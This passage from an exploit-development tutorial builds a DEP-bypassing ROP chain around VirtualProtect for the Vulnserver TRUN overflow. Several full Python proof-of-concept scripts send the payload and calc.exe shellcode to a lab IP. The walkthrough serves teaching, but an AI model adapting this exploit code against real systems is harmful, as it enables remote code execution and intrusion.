EAX still contains the original stack pointer value. What we need to do is manipulate EAX to equal the location of our shellcode. Well, that isn't entirely true: recall that in the updated POC there is a padding2 variable of 250 NOPs placed directly before the shellcode. All we need is for EAX to land on an address within those NOPs, since the NOP sled will slide into the shellcode.

What we need to do is increase EAX by 0x100 bytes, which should land close enough to our shellcode.

NOTE: This may change going forward. Depending on how many ROP gadgets we need for the ROP chain, our shellcode may get pushed farther down the stack. If this happens, EAX would no longer point to an area around our shellcode. If that problem arises, we can simply come back and add to EAX again.
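To make that a little less hand-wavy, here is a rough sanity check of the arithmetic behind choosing 0x100 (illustrative byte counts only- this is not part of the exploit):

# Everything that sits between the saved ESP (which points at the "mov eax, ecx"
# gadget on the stack) and the start of the NOP sled, at this point in the chain:
len_gadgets_before_params = 2 * 4     # mov eax, ecx  +  add esp, 0x1C
len_parameters            = 6 * 4     # VirtualProtect + 5 placeholder DWORDs
len_padding               = 4         # the 4 NOPs after the parameters
len_rop2_so_far           = 20 * 4    # rough size of the second ROP chain right now

distance_to_sled = (len_gadgets_before_params + len_parameters +
                    len_padding + len_rop2_so_far)
print(hex(distance_to_sled))          # roughly 0x74
# Adding 0x100 to EAX therefore lands about 0x8C bytes into the 250-byte NOP sled,
# which slides straight into the shellcode. If the chain grows, add another 0x100.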

Here is a useful ROP gadget for this:

0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  msvcrt.dll

For now, one of these instructions will do (a second one will be added later, once the ROP chain has grown and pushed the shellcode farther away). Also, keep in mind- we have a pop ebp instruction in this ROP gadget. This chain of ROP gadgets should be laid out like this:

  • add eax

  • 0x41414141 (padding to be popped into EBP)

Here is the updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, i.e. where to jump after the VirtualProtect call; not officially a part of the "parameters")
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

Now EAX contains an address within the NOP sled just before our shellcode; when execution returns there after the VirtualProtect() call, the sled will slide into the shellcode:

Up until this point, you may have been asking yourself, “how the heck are those parameters going to get changed to what we want? We are already so far down the stack, and the parameters are already placed in memory!” Here is where the cool (well, cool to me) stuff comes in.

Let’s recall the state of our registers up until this point:

  • ECX: location of return parameter placeholder
  • EDX: location of lpAddress parameter placeholder
  • EAX: location of shellcode (NOPS in front of shellcode)

Essentially, from here we just want to change what the memory addresses in ECX and EDX point to. Right now, they hold the addresses of the parameter placeholders- but those placeholders still contain junk values instead of pointers to our shellcode.

With a mov dword ptr ds:[ecx], eax instruction we can accomplish exactly what we need. That instruction takes the DWORD that ECX currently points to (the return parameter placeholder) and overwrites it with the value in EAX (the shellcode address).

To clarify: we are not making ECX point to EAX. We are making the return address placeholder contain the address of the shellcode, so that when the fake return address on the stack is used, execution goes straight to the shellcode.

We also need to do the same with EDX. EDX currently holds the address of the lpAddress parameter placeholder, which also needs to point to our shellcode (the address held in EAX). This means an instruction of mov dword ptr ds:[edx], eax is needed. It does the same thing described above, but uses EDX instead of ECX.
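If the pointer-write semantics feel abstract, here is a toy illustration in plain Python (not part of the exploit; the shellcode address is made up) of what mov dword ptr ds:[ecx], eax does to the fake parameter block:

import struct

fake_frame = bytearray(struct.pack('<L', 0x4c4c4c4c))  # the return address placeholder
eax        = 0x0189fb40                                # hypothetical address of the NOP sled/shellcode

# mov dword [ecx], eax: overwrite the DWORD that ECX points at with the value in EAX
fake_frame[0:4] = struct.pack('<L', eax)

print(hex(struct.unpack('<L', bytes(fake_frame))[0]))  # the placeholder now holds the shellcode address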

Here are two ROP gadgets to accomplish this:

0x6ff63bdb: mov dword [ecx], eax ; pop ebp ; ret  ;  msvcrt.dll
0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

As you can see, there are a few pop instructions that need to be accounted for. We will add some padding to the updated POC, found below, to compensate:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, i.e. where to jump after the VirtualProtect call; not officially a part of the "parameters")
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Padding between ROP Gadgets and shellcode. Arbitrary number (just make sure you have enough room on the stack)
padding2 = "\x90" * 250

# calc.exe POC payload created with the Windows API system() function.
# You can replace this with an msfvenom payload if you would like
shellcode = "\x31\xc0\x50\x68"
shellcode += "\x63\x61\x6c\x63"
shellcode += "\x54\xbe\x77\xb1"
shellcode += "\xfa\x6f\xff\xd6"

# 5000 byte total crash
filler = "\x43" * (5000-len(command)-len(crash)-len(parameters)-len(padding)-len(rop)-len(padding2)-len(padding2))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.148", 9999))
s.send(command+crash+rop+parameters+padding+rop2+padding2+shellcode+filler)
s.close()

A look at the disassembly window as we have approached the first mov gadget:

A look at the stack before the gadget execution:

Look at that! The return parameter placeholder (originally filled with 0x4c4c4c4c) was successfully overwritten to point to the shellcode area!:

The next ROP gadget of mov dword ptr ds:[edx], eax successfully updates the lpAddress parameter, also!:

Awesome. We are halfway there!

One thing you may have noticed from the mov dword ptr ds:[edx], eax ROP gadget is the ret instruction. Instead of a normal return, the gadget had a ret 0x000C instruction.

The number after ret is the number of extra bytes to remove from the stack after the return address is popped. 0xC in decimal is 12, and 12 bytes is three 4-byte values in x86 (each 32-bit DWORD is 4 bytes, and 4 bytes * 3 values = 12 total). These kinds of returns are used to "clean up" items from the stack. Essentially, this removes the next 3 stack entries after the ret is executed.

In any case- just as with pop, we will have to add some padding to compensate. As mentioned above, a ret 0x000C removes three memory addresses from the stack. First, the return instruction takes the value at the current stack pointer (which is the next ROP gadget in the chain) and loads it into EIP. EIP then executes that gadget as normal, which is why no padding is needed at that point. The 0x000C portion of the return from the now-previous ROP gadget then kicks in and removes the next three memory addresses from the stack. This is why padding for ret NUM instructions is placed after the NEXT ROP gadget instead of directly below, like pop padding.
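Put differently, the junk DWORDs that compensate for a retn 0x000C go after the next gadget in the chain, not directly below the gadget containing the retn. Here is a small sketch of that layout (reusing gadget addresses from this post):

import struct

chain  = struct.pack('<L', 0x77e942cb)  # mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C
chain += struct.pack('<L', 0x41414141)  # popped into ESI
chain += struct.pack('<L', 0x41414141)  # popped into EBP
chain += struct.pack('<L', 0x41ad61cc)  # xor eax, eax ; ret  <- loaded into EIP by the retn
chain += struct.pack('<L', 0x41414141)  # \
chain += struct.pack('<L', 0x41414141)  #  } the three DWORDs the retn 0x000C then discards
chain += struct.pack('<L', 0x41414141)  # /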

This will be reflected and explained a bit better in the comments of the code for the updated POC that will include the size and flNewProtect parameters. In the meantime, let’s figure out what to do about the last two parameters we have not calculated.

Almost Home

Now all we have left to do is get the size and flNewProtect parameters onto the stack (while compensating for the ret 0x000C instruction in the last ROP gadget).

Let's make the size parameter 0x300 bytes. This will easily be enough room for a useful piece of shellcode. Here, all we are going to do is spawn calc.exe, so for now 0x300 will do. The flNewProtect parameter should contain a value of 0x40, which gives the memory page read, write, and execute permissions.
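For reference, the 0x40 value comes straight from the Win32 memory protection constants; a few of the common ones are shown below (values from the Windows SDK headers):

# Win32 memory protection constants (from the Windows SDK headers)
PAGE_READWRITE         = 0x04
PAGE_EXECUTE_READ      = 0x20
PAGE_EXECUTE_READWRITE = 0x40   # read, write, and execute - the value we will use for flNewProtect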

At a high level, we will do exactly what we did last time with the return and lpAddress parameters:

  • Zero out a register for calculations
  • Insert 0x300 into that register
  • Make the current size parameter placeholder point to this newly calculated value

Repeat.

  • Zero out a register for calculations
  • Insert 0x40 into that register
  • Make the current flNewProtect parameter placeholder point to this newly calculated value.

The first step is to find a gadget that will “zero out” a register. EAX is always a great place to do calculations, so here is a useful ROP gadget:

0x41ad61cc: xor eax, eax ; ret ; WS2_32.dll

Remember, we now have to add padding for the last gadget’s ret 0x000C instruction. This will take out the next three lines of addresses- so we insert three lines of padding:

0x41414141
0x41414141
0x41414141

Then, we need to find a gadget to get 0x300 into EAX. We have already found a suitable gadget earlier in the chain! We will reuse this:

0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  msvcrt.dll

We need to repeat that three times (0x100 * 3 = 0x300). Remember to add a line of padding under each add eax, 0x00000100 gadget to compensate for the pop ebp instruction.
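As a side note, the repeated gadget-plus-padding pairs could also be generated programmatically instead of written out by hand- this is purely an illustrative sketch, and the POCs below keep the long-hand form:

import struct

ADD_EAX_100 = 0x6ff7e29a   # add eax, 0x00000100 ; pop ebp ; ret (msvcrt.dll)
JUNK        = 0x41414141   # consumed by the pop ebp

size_chain = (struct.pack('<L', ADD_EAX_100) + struct.pack('<L', JUNK)) * 3   # EAX += 0x300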

The last step is the pointer.

Right now, EDX still holds the address of the lpAddress parameter placeholder. We will increase EDX by four bytes so it reaches the size parameter placeholder, reusing an existing ROP gadget:

0x77f226d5: inc edx ; ret  ;  ntdll.dll

Now, we repeat what we did earlier and create a pointer from the DWORD within EDX (the size parameter placeholder) to the value in EAX (the correct size parameter value), reusing a previous ROP gadget:

0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

That pesky ret 0x000C is present again- make sure to keep a note of it. Also note the two pop instructions; add padding to compensate for those as well.

Since the process is the exact same, we will go ahead and knock out the flNewProtect parameter. Start by “zeroing out” EAX with an already found ROP gadget:

0x41ad61cc: xor eax, eax ; ret ; WS2_32.dll

Again- we have to add padding for the last gadget’s ret 0x000C instruction. Three addresses will be removed, so three lines of padding are needed:

0x41414141
0x41414141
0x41414141

Next we need the value of 0x40 in EAX. I could not find a viable gadget among the ones I enumerated to add 0x40 directly. So instead, in typical ROP fashion, I had to make do with what I had.

I added A LOT of add eax, 0x02 instructions. Here is the ROP gadget used:

0x77bd6b18: add eax, 0x02 ; ret  ;  RPCRT4.dll
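Since 0x40 / 0x02 = 32, that means 32 copies of this gadget. As a sketch (the POC below writes them out long-hand), the repetition could be generated like this:

import struct

ADD_EAX_2    = 0x77bd6b18   # add eax, 0x02 ; ret (RPCRT4.dll)
flNewProtect = 0x40         # PAGE_EXECUTE_READWRITE

flag_chain = struct.pack('<L', ADD_EAX_2) * (flNewProtect // 2)   # 32 gadgets -> EAX = 0x40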

EDX currently points to the size parameter placeholder. Increment it by four again to place the location of the flNewProtect parameter placeholder in EDX:

0x77f226d5: inc edx ; ret  ;  ntdll.dll

Last but not least, create a pointer from the DWORD referenced by EDX (the flNewProtect parameter) to EAX (where the value of flNewProtect resides):

0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  kernel32.dll

Updated POC:

import struct
import sys
import os
import socket

# Vulnerable command
command = "TRUN ."

# 2006 byte offset to EIP
crash = "\x41" * 2006

# Stack Pivot (returning to the stack without a jmp/call)
crash += struct.pack('<L', 0x62501022)    # ret essfunc.dll

# Beginning of ROP chain

# Saving ESP into ECX and EAX
rop = struct.pack('<L', 0x77bf58d2)  # 0x77bf58d2: push esp ; pop ecx ; ret  ;  (1 found)
rop += struct.pack('<L', 0x77e4a5e6) # 0x77e4a5e6: mov eax, ecx ; ret  ;  (1 found)

# Jump over parameters
rop += struct.pack('<L', 0x6ff821d5) # 0x6ff821d5: add esp, 0x1C ; ret  ;  (1 found)

# Calling VirtualProtect with parameters
parameters = struct.pack('<L', 0x77e22e15)    # kernel32.VirtualProtect()
parameters += struct.pack('<L', 0x4c4c4c4c)    # return address (address of shellcode, i.e. where to jump after the VirtualProtect call; not officially a part of the "parameters")
parameters += struct.pack('<L', 0x45454545)    # lpAddress
parameters += struct.pack('<L', 0x03030303)    # size of shellcode
parameters += struct.pack('<L', 0x54545454)    # flNewProtect
parameters += struct.pack('<L', 0x62506060)    # pOldProtect (any writeable address)

# Padding to reach gadgets
padding = "\x90" * 4

# add esp, 0x1C + ret will land here
# Increase ECX C bytes (ECX right now contains old ESP) to equal address of the VirtualProtect return address place holder
# (no pointers have been created yet)
rop2 = struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e17270)   # 0x77e17270: inc ecx ; ret  ;  (1 found)

# Move ECX into EDX, and increase it 4 bytes to reach location of VirtualProtect lpAddress parameter
# (no pointers have been created yet. Just preparation)
# Now ECX contains the address of the VirtualProtect return address
# Now EDX (after the inc edx instructions), contains the address of the VirtualProtect lpAddress location
rop2 += struct.pack ('<L', 0x6ffb6162)  # 0x6ffb6162: mov edx, ecx ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x50505050)  # padding to compensate for pop ebp in the above ROP gadget
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)

# Increase EAX, which contains old ESP, to equal around the address of shellcode
# Determine how far shellcode is away, and add that difference into EAX, because
# EAX is being used for calculations
rop2 += struct.pack('<L', 0x6ff7e29a)    # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack('<L', 0x41414141)    # padding to compensate for pop ebp in the above ROP gadget

# Replace current VirtualProtect return address pointer (the placeholder) with pointer to shellcode location
rop2 += struct.pack ('<L', 0x6ff63bdb)   # 0x6ff63bdb mov dword [ecx], eax ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Replace VirtualProtect lpAddress placeholder with pointer to shellcode location
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the last ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the last ROP gadget

# Preparing the VirtualProtect size parameter (third parameter)
# Changing EAX to equal the third parameter, size (0x300).
# Increase EDX 4 bytes (to reach the VirtualProtect size parameter placeholder.)
# Remember, EDX currently is located at the VirtualProtect lpAddress placeholder.
# The size parameter is located 4 bytes after the lpAddress parameter
# Lastly, point EAX to new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)   # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for retn 0x000C in the lpAddress ROP gadget
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x6ff7e29a)   # 0x6ff7e29a: add eax, 0x00000100 ; pop ebp ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP chain
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77f226d5)  # 0x77f226d5: inc edx ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77e942cb)   # 0x77e942cb: mov dword [edx], eax ; pop esi ; pop ebp ; retn 0x000C ;  (1 found)
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop esi instruction in the above ROP gadget
rop2 += struct.pack ('<L', 0x41414141)   # padding to compensate for pop ebp instruction in the above ROP gadget

# Preparing the VirtualProtect flNewProtect parameter (fourth parameter)
# Changing EAX to equal the fourth parameter, flNewProtect (0x40)
# Increase EDX 4 bytes (to reach the VirtualProtect flNewProtect placeholder.)
# Remember, EDX currently is located at the VirtualProtect size placeholder.
# The flNewProtect parameter is located 4 bytes after the size parameter.
# Lastly, point EAX to the new EDX
rop2 += struct.pack ('<L', 0x41ad61cc)  # 0x41ad61cc: xor eax, eax ; ret ; (1 found)
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x41414141)  # padding to compensate for retn 0x000C in the size ROP gadget
rop2 += struct.pack ('<L', 0x77bd6b18)	# 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
rop2 += struct.pack ('<L', 0x77bd6b18)  # 0x77bd6b18: add eax, 0x02 ; ret  ;  (1 found)
